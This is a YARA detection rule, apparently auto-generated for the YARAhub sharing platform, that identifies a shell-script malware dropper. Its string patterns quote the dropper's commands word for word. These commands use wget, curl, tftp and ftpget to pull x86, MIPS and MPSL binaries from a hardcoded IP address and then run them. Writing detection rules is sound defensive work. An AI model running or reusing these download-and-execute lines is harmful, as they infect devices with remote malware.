rule SCRIPT_Dropper_Unknown_ForgeAuto_1ee1d9cd
{
    meta:
        author = "Marjoriefort"
        description = "Detects Unknown (script_sh, etat binaire)"
        date = "2026-10-01"
        reference_sha256 = "1ee1d9cde9b629e2681680acfce8d2661d61f493fec138971b8bd950659a35be"
        yarahub_uuid = "e8a46653-7db3-4dd9-85d5-0f1b11ac7c64"
        famille = "unknown"
        famille_source = "inconnue"
        classe = "script_sh"
        etat = "binaire"
        confidence_suggeree = "medium"
        source = "forge_miss M3 v1.9.48"
        yarahub_license = "CC0 1.0"
        yarahub_rule_matching_tlp = "TLP:WHITE"
        yarahub_rule_sharing_tlp = "TLP:WHITE"
        yarahub_reference_md5 = "6907970e9afeef1106108ac904c3d415"
        yarahub_reference_link = "https://github.com/Marjoriefort/yara-rules"
    strings:
        $s0 = "Auto-generated by build.sh" ascii
        $s1 = "Served at: http://201.7.16.231/payload.sh" ascii
        $s2 = "ulimit -n 1024 2>/dev/null" ascii
        $s3 = "wget http://201.7.16.231/bins/x86 -O x86 2>/dev/null || \\" ascii
        $s4 = "curl -O http://201.7.16.231/bins/x86 2>/dev/null || \\" ascii
        $s5 = "tftp 201.7.16.231 -c get x86 2>/dev/null || \\" ascii
        $s6 = "tftp -r x86 -g 201.7.16.231 2>/dev/null || \\" ascii
        $s7 = "ftpget -v -u anonymous -p anonymous -P 21 201.7.16.231 x86 x86 2>/dev/null; \\" ascii
        $s8 = "[ -s x86 ] && cat x86 > ouroboros && chmod +x ouroboros && ./ouroboros" ascii
        $s9 = "wget http://201.7.16.231/bins/mips -O mips 2>/dev/null || \\" ascii
        $s10 = "curl -O http://201.7.16.231/bins/mips 2>/dev/null || \\" ascii
        $s11 = "tftp 201.7.16.231 -c get mips 2>/dev/null || \\" ascii
        $s12 = "tftp -r mips -g 201.7.16.231 2>/dev/null || \\" ascii
        $s13 = "ftpget -v -u anonymous -p anonymous -P 21 201.7.16.231 mips mips 2>/dev/null; \\" ascii
        $s14 = "[ -s mips ] && cat mips > ouroboros && chmod +x ouroboros && ./ouroboros" ascii
        $s15 = "wget http://201.7.16.231/bins/mpsl -O mpsl 2>/dev/null || \\" ascii
        $s16 = "curl -O http://201.7.16.231/bins/mpsl 2>/dev/null || \\" ascii
        $s17 = "tftp 201.7.16.231 -c get mpsl 2>/dev/null || \\" ascii
        $s18 = "tftp -r mpsl -g 201.7.16.231 2>/dev/null || \\" ascii
        $s19 = "ftpget -v -u anonymous -p anonymous -P 21 201.7.16.231 mpsl mpsl 2>/dev/null; \\" ascii
    condition:
        true and filesize < 50MB and 2 of ($s0, $s2, $s8, $s14) and 1 of ($s1, $s3, $s4, $s5, $s6, $s7, $s9, $s10, $s11, $s12, $s13, $s15, $s16, $s17, $s18, $s19)
}
